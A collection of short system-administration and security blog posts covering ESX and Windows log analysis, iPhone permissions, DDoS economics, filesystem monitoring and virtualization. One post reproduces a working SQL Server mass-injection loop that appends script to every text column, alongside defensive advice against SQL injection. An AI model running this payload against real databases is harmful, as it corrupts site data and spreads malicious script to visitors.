Niel M. Bornstein

Earlier this year, without any logical reason, the wireless on my wife’s MacBook went flaky.

We had been using it for over a year with no problems whatsoever, but since I installed new recessed lighting in my kitchen, the MacBook has had intermittent problems getting a signal from the Linksys WRT54G router in the basement. No other laptops have any problem connecting, and the MacBook has no problem connecting to other wireless networks.

I used to be a Mac pro, but my Mac OS X chops are a little flabby. I’ve examined the logs to see if there is some explanation for this problem, but I can’t figure it out. There are basically two or three areas of the house where I am more or less guaranteed to receive a signal; the rest of the house is a big, intermittent dead zone.

Niel M. Bornstein

Call me naive, but I still enjoy traveling. Maybe it’s because I have not been seriously affected by delays or cancellations (pace my trips to Kelowna), but there’s still little I like better than getting on a plane and going somewhere new. Especially when, as is true now, it’s been a number of weeks since I’ve been out of town.

This week it’s New York City for two nights. I’ll be manning the Novell booth at Interop New York on Wednesday and Thursday, and I will be taking time to meet up with friends who are attending the O’Reilly Web 2.0 conference next door.

Come by and say hello at booth 439 if you’re coming to Interop, or give me a shout if you’re in town and want to meet up.

Anton Chuvakin

Following the new “tradition” of posting a security tip of the week (mentioned here, here; SANS jumped in as well), I decided to follow along and join the initiative. One of the bloggers called it “pay it forward” to the community.

So, Anton Security Tip of the Day #16: Virtually Screwed - Journey Into VMWare ESX Log Analysis

The CISecurity guide for VMWare (here) and the DISA STIG for virtual machines (here) both mandate collection and analysis of VM platform logs; neither goes into enough detail on what to look for in those logs. Let’s try to shed some light on security-focused log analysis of VMWare ESX v. 3.x logs.

First, at least until ESXi becomes the default choice, one needs to keep in mind that ESX is “Linux-inside” and thus diving into /var/log will not reveal any “alien technology” (well, not much :-)). However, one of the most useful logs is /var/log/hostd.N, which is not a descendant of the standard Linux logs. Extensive VM event records are written into this file.

Let’s focus on various types of logins to the ESX platform and identify logs that indicate successful and failed attempts to log in. Here are a few useful examples to analyze:

Successful logins:

  • May 30 09:20:42 esx2 su(pam_unix)[9405]: session opened for user root by jhonny(uid=1626)

This is a classic Linux root login message; you can watch for these by searching VMWare ESX logs for “session AND opened AND user AND root.” Notice the user name of the user who switched to root.

  • May 30 09:20:34 esx2 sshd(pam_unix)[9364]: session opened for user jhonny by (uid=0)

This is also a classic Linux message for a normal (non-root) user login.

  • [2008-05-25 06:57:48.774 ‘ha-eventmgr’ 111639472 info] Event 40645 : User jhonny@1.1.1.1 logged in

This is a VMWare-specific application login to ESX. You can track such events by username, by event ID or by the keywords “event AND logged AND user” (if you are using search).

Failed logins:

  • May 30 09:20:31 esx2 sshd[9356]: Failed password for jhonny from 1.1.1.1 port 54773 ssh2

Another classic Linux message from the ESX system: a failure to log in due to an incorrect password.

  • May 27 12:06:59 esx2 sshd[4756]: Failed password for illegal user jonny from 1.1.1.1 port 30594 ssh2

A message indicating a failure to log in due to an incorrect username (note the typo).

  • May 25 07:03:48 esx1 sudo: jhonny : 3 incorrect password attempts ; TTY=pts/0 ; PWD=/var/log ; USER=root ; COMMAND=/bin/bash

This ESX Linux platform message should also be familiar to Linux/Unix admins: it indicates multiple sudo password failures; look for such messages in the logs.

BTW, do you need to be reminded to track NOT only failed, but also successful login events?!
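The sample messages above can be turned into a rough classifier. What follows is a minimal Python sketch, assuming the log lines look like the examples in this tip; the pattern labels and the `classify_login` helper are invented for illustration, and real ESX 3.x output may well differ.

```python
import re

# Patterns derived only from the sample lines in this tip (an assumption:
# other ESX builds may format these messages differently).
LOGIN_PATTERNS = [
    ("success", "su_to_root", re.compile(
        r"su\(pam_unix\)\[\d+\]: session opened for user root by (?P<user>\w+)\(uid=\d+\)")),
    ("success", "ssh_session", re.compile(
        r"sshd\(pam_unix\)\[\d+\]: session opened for user (?P<user>\w+) by")),
    ("success", "hostd_login", re.compile(
        r"Event \d+ : User (?P<user>[^@\s]+)@(?P<src>\S+) logged in")),
    ("failure", "ssh_unknown_user", re.compile(
        r"sshd\[\d+\]: Failed password for illegal user (?P<user>\S+) from (?P<src>\S+)")),
    ("failure", "ssh_bad_password", re.compile(
        r"sshd\[\d+\]: Failed password for (?P<user>\S+) from (?P<src>\S+)")),
    ("failure", "sudo_bad_password", re.compile(
        r"sudo: +(?P<user>\S+) : \d+ incorrect password attempts")),
]


def classify_login(line):
    """Return a dict describing the login event in `line`, or None."""
    for outcome, kind, pattern in LOGIN_PATTERNS:
        match = pattern.search(line)
        if match:
            # groupdict() holds the user and, where the message has one,
            # the source address.
            return {"outcome": outcome, "kind": kind, **match.groupdict()}
    return None
```

Feeding every line of /var/log/messages, /var/log/secure and hostd.N through `classify_login` and counting results per user is one way to keep both successful and failed logins in view.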

Overall, you must prepare for the future by learning to analyze VMWare logs, just as you learned to handle logs from “legacy” OSes such as Linux/Unix and Windows.

As I said before, I am tagging all the tips on my del.icio.us feed; here is the link: All Security Tips of the Day.

Anton Chuvakin

My next logging poll is out - with it I set out to figure out an old mystery of mine: why people don’t protect their log data (e.g. see this lamentation, “Top 11 Reasons to Secure and Protect Your Logs”).

Vote away! As always, results will be posted.

Past polls and analysis are all here. Enjoy!

Brian K. Jones

I had a really fantastic time at OSCON this year. When I went to OSCON in 2006, I was a little put off by the fact that there seemed to be very little focus on systems administration, and meanwhile systems administrators are responsible for huge swaths of open source software growth in businesses large and small. I’m happy to report that this year’s OSCON had quite a bit of focus on topics of interest to systems folks, including myself. Thanks, ORA!

But on the 5-day flight back to the east coast (ok, maybe it just felt like 5 days), I had a chance to think more about what I had seen and heard. I had a lot of conversations, mostly with developers, about cloud computing initiatives like AppEngine, Amazon Web Services, BigTable, and the like. My take on this is that Amazon and Google are providing developer-centric interfaces to help them solve traditional systems administration problems… and they appear to be doing it with some success.

So one might ask… “where does this leave the lowly sysadmin?”

It leaves you in an extremely fast-paced, ever-changing technological landscape with a set of needs, tools, and technologies that never stop evolving, and cause a lot of perceived community fragmentation while everyone scrambles to figure out which direction is “the way to go”. Sound familiar? It should. It’s exactly where you’ve been for your entire career. Some would say it’s the fact that things never seem to stagnate that makes them love system administration in the first place!

What I view as being pretty exciting (and I hope this continues - call me a blasphemer) is that, because of these developer-centric systems interfaces, there’s a bit of a forced convergence: developers have no choice but to have some understanding of what’s happening under the hood, because they’re going to have to write tools to essentially “rope in the cloud” — to manage all of this stuff. On the other hand, systems administrators would probably do well to take this opportunity to do more interesting stuff with code than the typical pushing out of account information, watchdog scripts, custom log parsers, system tool wrappers, and the like.

It’s a great time to pick up a new language, too, if you have an interest. Lots of sysadmins have picked up Ruby and/or Python as a means of broadening their horizons. If you use and like Perl, there’s no reason you can’t use it, but seeing what the hubbub is about surrounding newer stuff that looks like it’s more than a fad by now can’t hurt. I personally chose Python as my primary language because I never liked Perl, and Ruby *looks* like Perl to me (though I still dabble with it just to be familiar). If you *like* Perl, check out Ruby. If you only use Perl because you have to, give Python a shot! There are client libraries for a lot of these new services available in Ruby, Python, Perl, and PHP.

Dive into the cloud! The water’s fine!

Chris Josephes

I’ve been seeing this SQL Server code running wild for the past few days:

DECLARE @T varchar(255), @C varchar(255);
-- Cursor over every text-like column of every user table
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u' AND
        (b.xtype = 99 OR     -- ntext
         b.xtype = 35 OR     -- text
         b.xtype = 231 OR    -- nvarchar
         b.xtype = 167);     -- varchar
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
    -- Append the payload to whatever the column already contains
    EXEC(
        'update [' + @T + '] set [' + @C + '] =
        rtrim(convert(varchar,[' + @C + ']))+
        ''Exploit JavaScript goes here'''
    );
    FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

Actually, the insertion of this code into web servers happens from a DECLARE statement that encodes the entire payload in hexadecimal characters, which is then helpfully translated into exploit code by your own database server. In a way, your SQL Server database hacks itself.
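If you are combing through web server logs for this kind of request, it helps to decode the hexadecimal blob yourself so you can see what the database would have run. Here is a small Python sketch of that idea; the `decode_hex_literals` helper, the eight-byte minimum length, and the shape of the sample request (including its CAST wrapper) are assumptions made for illustration, and the payload is a harmless stand-in.

```python
import re

# A "0x" prefix followed by at least eight hex-encoded bytes. The minimum
# length is an arbitrary choice to skip short, innocent hex numbers.
HEX_LITERAL = re.compile(r"0x((?:[0-9A-Fa-f]{2}){8,})")


def decode_hex_literals(request_text):
    """Return the decoded text of every long 0x... literal in request_text."""
    decoded = []
    for match in HEX_LITERAL.finditer(request_text):
        raw = bytes.fromhex(match.group(1))
        # Text encoded as UTF-16LE has a NUL in every second byte when the
        # characters are plain ASCII; otherwise treat it as single-byte text.
        if len(raw) % 2 == 0 and raw[1::2].count(0) == len(raw) // 2:
            decoded.append(raw.decode("utf-16-le"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


# Hypothetical logged request carrying a harmless payload.
payload_hex = "SELECT 1 -- harmless".encode("ascii").hex()
sample = ("id=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + payload_hex
          + " AS VARCHAR(4000));EXEC(@S);")
print(decode_hex_literals(sample))
```

The decoder only reveals what was sent; it says nothing about whether the statement actually executed on your server.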

It’s been around since January, but the payloads have been different. Either multiple people are using the exploit, or the exploits are modified on a per-hire basis and delivered through the same bot network. One hacker with a client hack pays some other hacker with a server hack, and they go to town. The process attacks hundreds of insecure websites, which in turn attacks thousands of client hosts.

The interesting thing is that this code doesn’t really have a catchy name like all of the other exploits. Server exploits never get much attention in the media compared to viruses that attack millions of workstations at once, like Nimda, Melissa, or others.

DBA1: “Hey, did you hear that one website got compromised by ‘Column Smasher’?”

DBA2: “No, I thought it was called ‘Lemon Pledge’.”

DBA1: “Why would a database exploit be called ‘Lemon Pledge’?”

DBA2: “Because it cleans everything from your tables.”

There have been a few reports of these attacks hitting ColdFusion servers. Thanks to Google and the .cfm file extension, it isn’t too hard to find a ColdFusion server out there. And if someone is using ColdFusion, they’re probably just coding in CFML, which isn’t a very robust language.

Remember FormMail? FormMail was that horrible CGI script that everyone abused to send out spam. Well, it seems like people haven’t taken the hint. All information passed from a web client to the server through a GET or POST method should be considered dangerous. Web page constraints, JavaScript/AJAX validators, and hidden form fields can’t protect your database. Depending on how your web forms and server applications are written, you’re allowing outside input from unknown sources to be inserted into the middle of your humble SQL statement. The most important firewall protecting your database is your server-side application.

Here are a few things you can do to protect your database from SQL injection attacks. Suggestions 1 through 3 range from low-level sanitization to high-level extreme SQL programming. Suggestion 4 is geared more towards administrative efforts by a Database Administrator to protect their system from a web developer’s badly programmed application.

1. Sanitize the input. Run regular expression filters that ideally work from a pattern of allowed characters: accept only alphabetical characters and numerals, and strip everything else out.

2. Use SQL bind variables to contain web application input, after it’s been filtered.

3. Using stored procedures can give you the benefit of limiting what statements your web application can execute on the database server. Keep in mind that stored procedures are still pretty complex, and unless they’re coded properly, they may not add any security beyond what the application provides.

4. Block select privileges to the sysobjects and other system tables. And just because you’re not running SQL Server, don’t assume you’re in the clear. Check with your DB vendor to see specific instructions on how your server handles the Information Schema portion of the SQL-92 standard.
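Suggestions 1 and 2 can be sketched in a few lines. The Python example below uses the standard library’s sqlite3 module purely as a stand-in for SQL Server; the `users` table and the `sanitize` and `find_user` helpers are hypothetical, and your own driver’s placeholder syntax may differ.

```python
import re
import sqlite3

# Suggestion 1: keep only letters and digits, strip everything else.
DISALLOWED = re.compile(r"[^A-Za-z0-9]")


def sanitize(value):
    """Remove every character that is not an ASCII letter or digit."""
    return DISALLOWED.sub("", value)


def find_user(conn, raw_name):
    """Look up a user by name without building SQL from user input."""
    name = sanitize(raw_name)
    # Suggestion 2: the ? placeholder is a bind variable, so the value is
    # passed separately and is never parsed as part of the SQL text.
    cursor = conn.execute("SELECT id, name FROM users WHERE name = ?", (name,))
    return cursor.fetchall()


# Hypothetical in-memory table for demonstration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
```

With this in place, `find_user(conn, "alice' OR '1'='1")` simply looks for a user literally named `aliceOR11` and finds nothing. A strict letters-and-digits filter is too blunt for many real fields (names with apostrophes, for one), which is why the bind variable, not the filter, is doing the heavy lifting here.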

Chris Josephes

“(Twitterrific/Urban Spoon/Where) would like to use your current location”

Once I select “Ok” two times while running the program, the iPhone no longer asks; it assumes the program has carte-blanche to know my location. I haven’t been prompted for any other security issues yet, but I’ve only used about six or seven applications so far.

Granting privilege escalation on an application-by-application basis is good, but I’d like to make a couple of recommendations for the next release of the iPhone OS.

1. From the “Settings” application, give me a master list of all installed applications, so I can say in advance whether an app can have, cannot have, or must always ask for the privilege it is requesting.

2. Clearly identify that the OS is prompting for privilege escalation, and not the application itself.

3. Create more privileges. For example, Twitterrific needs permission to know where I am; but MyStreets doesn’t need permission to read and sort all of the contacts on my phone. And with VoiceRecord, I was never prompted for permission for the application to listen to my microphone. That would suggest that any application could just read the contact info or use the microphone at any time. Maybe I’m wrong, or maybe Apple’s application screeners check this out beforehand.

Chris Josephes

I came, I saw, I conquered, and somehow, I also managed to activate my new 3G iPhone. And I seem to be the only guy I know in my area that has made it past that final step.

Early this morning, two co-workers, assorted friends, and I found each other at different points in the line. The following is a transcript of the events, recreated from SMS messages and Twitter posts.

6:00 Woke up late.
6:41 (incoming SMS from Clay) Where are you?
6:42 (reply to Clay) Sorry, woke up late. ETA to MoA = 12 minutes
6:55 (to Clay) Fyckinf light rail car blocking mall entrance!
6:56 (reply from Clay) LOL!
7:00 Parked at west entrance, standing in line.
7:20 I download an app to my old EDGE phone to pass the time.
7:35 I can’t believe she cut in front of me and 8 other people. Is she married to that guy?
7:55 Curtains are down
8:00 Line’s moving
8:03 People cheer and applaud at the first sale. (this is starting to make me cynical)
8:30 In store
8:35 With personal concierge. Handled upgrade of AT&T account.
8:40 Sign-in to iTunes failed.
8:45 Bought hard plastic case from Contour Design. Unlike the old metal phone, the plastic case could never look badass.
8:47 Heading in to the office
8:50 Neither phone works. EDGE unavailable on old phone, but Wi-Fi works on both phones.
9:03 Try plugging new phone into PC, and running iTunes. No joy.
9:39 Receive SMS page from AT&T.
10:13 Receive second SMS page from AT&T. Unexpected incoming call arrives.
10:14 Confirmed that phone is working.

My activation process never was fully completed, but it seems to work. This was my first time camping for an Apple product, so I’ll give the experience a 6 on a scale of 1-10 for excitement. The store purchase flow was smooth (despite the iTunes unresponsiveness), employees were helpful and friendly, and they managed to handle the crowd pretty quickly.

New York and the East Coast had a one hour advantage over us mid-westerners, so there was already a strain on the sale process by the time we were let in. I’m guessing if you are currently holding a brick, it’ll either self activate, or you’ll have better luck with iTunes this afternoon.

Robert Hansen

Thwarting DDoS attacks is good for tier 1 content providers - and not for the reason you’re probably thinking. I was talking with someone who recently ejected from the content provider world, and he told me an interesting story about how peering relationships are actually impacted by DDoS (distributed denial of service) attacks. Let’s say for a moment that you’re providing hosting for some of the largest companies in the world. Chances are you are pushing a lot more packets out to users on the Internet than you are receiving.

It turns out that tier 1 peering agreements are set up in such a way that they want it to be as close to a 1 to 1 relationship as possible in terms of ingress and egress packets. If you as a content provider slip too far below a certain threshold you can get re-negotiated to a tier 2 or tier 3 status, giving you far worse rates, worse service level agreements and less quality of service. But the problem is if you are a content provider, you generally receive about 1K of data inbound and push out dozens or hundreds of packets on the outbound for each request. Hardly a 1 to 1! Kiss your tier 1 status goodbye!

So in comes a DDoS attack. Generally speaking, DDoS attacks try to consume bandwidth or system resources. In either case they create a great many outbound packets as the systems try to respond to the attack. Left unchecked, this would make the ratio of inbound to outbound packets worse, to say nothing of the more obvious negatives for your consumers in not being able to reach your sites!

Off you go to find yourself an anti-DDoS vendor to fit your needs and after implementing them you suddenly realize you are now no longer responding to the DDoS attack with packets from your side. Instead the ratio of packets becomes closer to equilibrium - as many inbound packets as outbound. Your inbound packets are a mix of good and bad traffic, of course, but maintaining that tier 1 relationship is key for many large content providers, so that same DDoS attack (and thwarting it) became a huge business asset suddenly.

Now, that leads us to the next obvious leap of logic - where any inbound automated traffic that can be blocked might be worth blocking, to a point, so that your levels of inbound and outbound traffic are stabilized. Web application firewalls fit into that mold, where they are able to send significantly less traffic if they block traffic that is not destined to a real person. Blocking the spiders and robots that won’t affect your marketing efforts with the search engines seems like an easy way to solve some of the massive outbound packet issues that cause content providers so much pain with their peering agreements.

Clearly the benefits are visible to anyone who penny pinches regarding their bandwidth bills, but this was an interesting new take on how to justify the cost of your security devices, if you needed another bullet in your justification to your boss.

Anton Chuvakin

Following the new “tradition” of posting a security tip of the week (mentioned here, here; SANS jumped in as well), I decided to follow along and join the initiative. One of the bloggers called it “pay it forward” to the community.

So, Anton Logging Tip of the Day #15: Fear and Loathing in Event 567

This tip digs into a seemingly simple, but really VERY esoteric subject: monitoring file access and modification via a Windows event log. Now, some people - who never studied this subject - tend to have a very simplistic view of this: just enable Object Access auditing, then right-click on a file or directory, click Security->Advanced->Auditing and then pick what types of events will be logged and by what accessing entities (i.e. users or computers). OK, so this will produce some logs, that is for sure. But are they useful?

First, why are we doing this? We typically need to know the following when we audit file access in Windows (or any other OS for that matter) for security (monitoring and investigation) or compliance:

  • Time/date
  • Computer where it happened
  • User who touched the file
  • Application he used to access the file
  • File name + location (directory, share, etc)
  • Type of access (read, write, create, delete, etc)
  • Status (i.e. success or failure)

Can we get this from the above logs? No.

What? No!?! Really?

Yes, really. We can get some of the above, some of the time, not all of the above, all of the time. Here is an example: we are looking at event ID 560 (picture) and then at an extract from its description field.

Event:

[Screenshot: event_log-560_1]

Description (selected field):

Object Server: Security
Object Type: File
Object Name: C:\0\TestBed\simple_text_file.txt
Image File Name: C:\WINDOWS\system32\notepad.exe
Primary User Name: Anton
Primary Domain: XXXXXX
Accesses: READ_CONTROL
          SYNCHRONIZE
          ReadData (or ListDirectory)
          WriteData (or AddFile)
          AppendData (or AddSubdirectory or CreatePipeInstance)
          ReadEA
          WriteEA
          ReadAttributes
          WriteAttributes

WTH is that? Well, we know that the user ‘Anton’ has successfully read? wrote? changed attributes? did something? with a file named “C:\0\TestBed\simple_text_file.txt” using a program named “C:\WINDOWS\system32\notepad.exe.” That’s the best we can get, in this case! We may try to look at event IDs 562 and 567, but this missing information (i.e. the exact action performed) will not be added.

BTW, there will be a few dozen more (sometimes hundreds!) of the 560s, 562s and 567s produced - all from just opening the text file in Notepad. The above event is notable for having BOTH “notepad” and “simple_text_file.txt” in the same event; others will have only one of the two.

Does anything else get in the way? Yes, lots! MS Office will write to all files, even those just opened for reading (with no user modifications to the content whatsoever), which will screw up your log monitoring efforts. If the file is on a share, more information will be missing (e.g. the username might be).

So, how to use Windows event logs for file access tracking?

  1. Enable logging (as described above)
  2. Pick events 560 (most useful) and 562, 567 (useful too)
  3. Look for fun filenames that might be touched by the users (have a list of files and users handy)
  4. Figure out what programs were used to access them (this is called “Image File Name” in “WinLogSpeak”)
  5. Ponder the ‘Accesses’ section of each event until your brain turns blue :-) or until you decide whether such access is authorized or not…
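Steps 3 through 5 get a little less painful with a script. The following is a rough Python sketch that pulls the interesting fields out of an event 560 description; it assumes you have already exported the description as plain text in the “Key: value” layout shown earlier, and the `parse_event_description` and `summarize` helpers are names made up for this example.

```python
# Access names copied from the sample event; treating these four as
# "write-type" accesses is an assumption made for this sketch.
WRITE_ACCESSES = {
    "WriteData (or AddFile)",
    "AppendData (or AddSubdirectory or CreatePipeInstance)",
    "WriteEA",
    "WriteAttributes",
}

SAMPLE_DESCRIPTION = r"""
Object Server: Security
Object Type: File
Object Name: C:\0\TestBed\simple_text_file.txt
Image File Name: C:\WINDOWS\system32\notepad.exe
Primary User Name: Anton
Primary Domain: XXXXXX
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
ReadEA
WriteEA
ReadAttributes
WriteAttributes
"""


def parse_event_description(text):
    """Map each 'Key: value' field to a list; bare lines extend the last key."""
    fields = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        key, separator, value = line.partition(": ")
        if separator:
            current = key
            fields[current] = [value]
        elif current is not None:
            fields[current].append(line)
    return fields


def summarize(fields):
    """Reduce a parsed event to who, with what program, on which file."""
    accesses = fields.get("Accesses", [])
    return {
        "user": fields["Primary User Name"][0],
        "program": fields["Image File Name"][0],
        "file": fields["Object Name"][0],
        # Only says a write-type access appears in the list, not that the
        # file was actually modified.
        "write_access_listed": any(a in WRITE_ACCESSES for a in accesses),
    }
```

Calling `summarize(parse_event_description(SAMPLE_DESCRIPTION))` gives you the user, program and file in one record, which you can then match against your list of interesting files and users. It does not solve the underlying problem: the log still does not tell you which of the listed accesses was really performed.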

Overall, this is still very useful for file access monitoring, but the process is paaaaaainful.

BTW, I am tagging all the tips on my del.icio.us feed. Here is the link: All Security Tips of the Day.


Anton Chuvakin

UPDATE: analysis of this poll is posted here.

So, my next poll is up - and it is fun: Which of the types of information are most useful when trying to make sense of a log entry?

Vote here!

Past polls:

  • Poll #7 “What tools do you use for Windows Event Log collection?” (analysis)
  • Poll #6 “Which logs do you LOOK at?” (analysis)
  • Poll #5 “What are your top challenges with logs?” (analysis)
  • Poll #4 “Who looks at logs in your organization?” (analysis)
  • Poll #3 “What do you do with logs?” (analysis)
  • Poll #2 “Why collect logs?” (analysis)
  • Poll #1 “Which logs do you collect?” (analysis)

  • Chris Josephes

    This doesn’t look good, right?

    [Graph: home2-vol.gif]

    Most open source monitoring tools do filesystem health checking by comparing the current percentage of used space against a set value. If it’s 90% full, send out a warning page; if it’s 89%, send the all clear.

    Notice that I said filesystem, and not actual disk. A single disk that’s 90% full can be a bad thing, because there are fewer free blocks available for writing, which leads to longer write times and file fragmentation. Not all filesystems are restricted to a single disk: there may be a back-end RAID solution, or the filesystem may be a shared filesystem served over NFS.

    Unfortunately, you could be the receiver of flapping alert pages where a filesystem sits between 90% and 89%, but it still performs fine. Unlike a broken Ethernet cable, the resolution for a filesystem threshold may not be so easy. Sometimes there are files that can’t be deleted, or there may not be any additional storage to allocate. You may have a filesystem that sits at 91% full for months simply because a new disk shelf won’t arrive until the next budget cycle.

    Everything comes down to disk blocks, even SAN and NAS solutions. That brings back the concern regarding fragmentation and performance. But what if your filesystem is a read-only OS image? Or what if it turns out 10% equates to 500 gigabytes on a huge disk appliance? If the filesystem is never being written to, or if the amount of writes equates to 0.001% of the entire filesystem, then where’s the fire?

    What about the inverse? What if your filesystem never reaches 90% full? Can there still be problems?

    In the above graph, nobody would have been paged by Nagios or other tools, because the filesystem never reached 90%. For the past few months it averaged 40% full, shot up to 75%, and then went back down. A newly released application was behaving incorrectly, and the issue was caught by the programmer. The next morning he stealthily re-released the application and corrected the issue. Nobody in systems administration noticed until the graph was checked in relation to another issue. If the programming error had never been discovered, the filesystem would have filled up, probably at the most inconvenient time possible for a systems administrator.

    I would like to recommend that people developing filesystem or disk monitoring solutions change their way of thinking about filesystem health. Hard limits on allocated space may still be required, but those warnings should be optional. Measuring fullness makes assumptions about block structure that may not be correct.

    At the same time, the monitoring system should take the standard deviation of the filesystem percentage over the past 24 hours and compare it to the standard deviation for the past hour. Actually, you’d probably want to take the first 23 hours out of 24, grab that standard deviation, and compare it to the deviation of the last hour.

    If those two deviations aren’t close, then there could be radical changes being made to your filesystem that need to be addressed. Maybe files are being added or deleted; either way, it may warrant an investigation. For large filesystems in the terabyte/petabyte range, using the percentage value may not be granular enough, so you will need to work with the actual value of free kilobytes or blocks.
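The comparison described above might look something like this in Python. It is only a sketch under stated assumptions: samples arrive at a fixed interval, the `ratio` and `floor` thresholds are arbitrary numbers picked for illustration, and it flags only the case where the last hour is much more volatile than the preceding 23.

```python
from statistics import pstdev


def usage_volatility(samples_24h, samples_per_hour):
    """Return (baseline_sd, recent_sd): first 23 hours versus the last hour."""
    if samples_per_hour < 1 or len(samples_24h) != 24 * samples_per_hour:
        raise ValueError("expected exactly 24 hours of evenly spaced samples")
    baseline = samples_24h[:-samples_per_hour]
    recent = samples_24h[-samples_per_hour:]
    return pstdev(baseline), pstdev(recent)


def is_suspicious(samples_24h, samples_per_hour, ratio=3.0, floor=0.5):
    """Flag a filesystem whose last hour is far more volatile than usual.

    ratio and floor are hypothetical tuning knobs: the last hour must
    deviate `ratio` times more than the baseline, and by at least `floor`
    units, so a perfectly flat baseline does not trigger on tiny changes.
    """
    baseline_sd, recent_sd = usage_volatility(samples_24h, samples_per_hour)
    return recent_sd > max(baseline_sd * ratio, floor)
```

The samples can be percentages or, for very large filesystems, free kilobytes or blocks; in the latter case `floor` has to be scaled to match the unit.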

    I take it back. This isn’t a recommendation to monitoring developers, this is a challenge. The first major open source monitoring guy that puts this solution together will have my undivided attention.

    When I first started using LVM I got bit by a few bugs. It’s all part of being an early adopter. As a result I never really used it on production hardware. It wasn’t until about 2 years ago that I gave it another look. In a similar manner, I never really thought of software RAID as much more than a novelty. Much of that has changed now, and I use them both on a regular basis for a number of reasons.

    Chris Josephes

    I’m working with a product that includes this disclaimer in their support documentation:

    “Virtual environments, such as VMWare (and others) are not recommended, and thus not supported.”

    I can almost see their point. It’d be pretty daunting to gauge a benchmark if a customer described the running host as “1/13th of two dual core processors, 3.1 gigs of memory, and a 27 gigabyte filesystem disk”. True, that’s a pretty extreme situation, but I wouldn’t doubt it if there was the occasional bad provisioning by virtual system installers.

    Anyone who implements virtualization is implicitly trusting the VM solution to do the right thing, and when we see the operating system up and running, we just assume everything works perfectly. But let’s be honest: almost every VM solution creates some overhead, so you’re missing out on a few resources. That loss shouldn’t amount to much, but it could mean a lot to an application. And while CPU and memory can be partitioned, device I/O, such as hard disk access, is a little sketchy.

    To the developers of the above unnamed application, I know it’s going to be a big hassle, but five years from now, you’re not going to be able to avoid virtualization. Instead of the blanket disclaimers, increase your virtualization knowledge base, and create more test suites. Find out what works, what doesn’t, and why. It’s still okay to set guidelines on usage, but a wholesale avoidance of virtualization will hurt in the long run.

    Chris Josephes

    Last week I attended a virtualization seminar. I did not expect a lot from the event at first, but I was surprised by the quality of the guest speakers. Both had strong backgrounds with VM environments, and they did a good job of explaining what it takes to migrate to VM.

    One of the speakers made an interesting statement, saying that the hypervisor is now commoditized. The market for virtual solutions has gotten so big, it’s unavoidable. VMWare has ESX, Xen has their system, and Microsoft is coming out with Hyper-V. If everybody offers what is essentially the same thing, then how do these products stand out from one another?

    Now your incentives for buying virtualization have changed. You don’t buy VMWare just because it offers virtualization; you buy VMWare because it has the best service, and the best hot migration features. You might buy Hyper-V because you’re familiar with Microsoft’s internal APIs and management tools. On top of virtualization, I’m not sure what else Xen has to offer, but there could be new features coming out from Citrix.

    When I left the seminar, I started to re-evaluate hardware decisions that were made in the past. The nature of the beast has changed. Eight years ago, hardware decisions were taken for granted, because hardware, too, was commoditized.

    Everything ran on an x86, and everyone made an x86, so the low price usually won out. Anything that the vendor offered on top of the low price might have clinched the deal. Better support, better service, free shipping? Whatever it took to sell a server and get it out the door. Hundreds of IT departments packed data centers full of tight 1RU servers. Virtualization has now made those servers worthless.

    When a single server failed, it was no big deal. You probably had another one just like it running the same application. If that same server is now running multiple virtual hosts, then the service impact is higher. Two machines may now be fighting for access to the same mirrored local disks. What are the chances that they’re impacting each other?

    If your server can only handle 2 running virtual hosts, then you cut hardware costs by 50%; but in order to win, your hardware savings still need to be higher than the support and licensing costs of your enterprise VM solution. A 2 to 1 hardware savings ratio isn’t good; it’s expected. In order to maximize your investment, you should aim for a 4 to 1 hardware savings ratio, maybe higher.
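To make the arithmetic concrete, here is a back-of-the-envelope Python sketch. Every number in it is hypothetical, the `consolidation_savings` helper is invented for this example, and it makes the simplifying assumption that a virtualization host costs the same as the single-purpose server it replaces, which a real host built for 4 or more guests probably would not.

```python
def consolidation_savings(hosts, ratio, server_cost, vm_cost_per_server):
    """Net savings from running `hosts` workloads at `ratio` guests per server.

    vm_cost_per_server stands for the support and licensing cost of the VM
    solution on each physical server (a hypothetical flat figure).
    """
    servers_needed = -(-hosts // ratio)  # ceiling division
    cost_before = hosts * server_cost
    cost_after = servers_needed * (server_cost + vm_cost_per_server)
    return cost_before - cost_after


# Hypothetical figures: 40 workloads, 5000 per server, 6000 per server
# in VM licensing and support.
print(consolidation_savings(40, 2, 5000, 6000))
print(consolidation_savings(40, 4, 5000, 6000))
```

With these made-up figures, the 2 to 1 case loses money once licensing is counted, while the 4 to 1 case comes out well ahead.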

    Migrating to a VM environment does not mean building a VM solution into your servers; it means building your servers around a VM solution. If the hypervisor really is treated like a commodity, then the same can no longer be said about the hardware.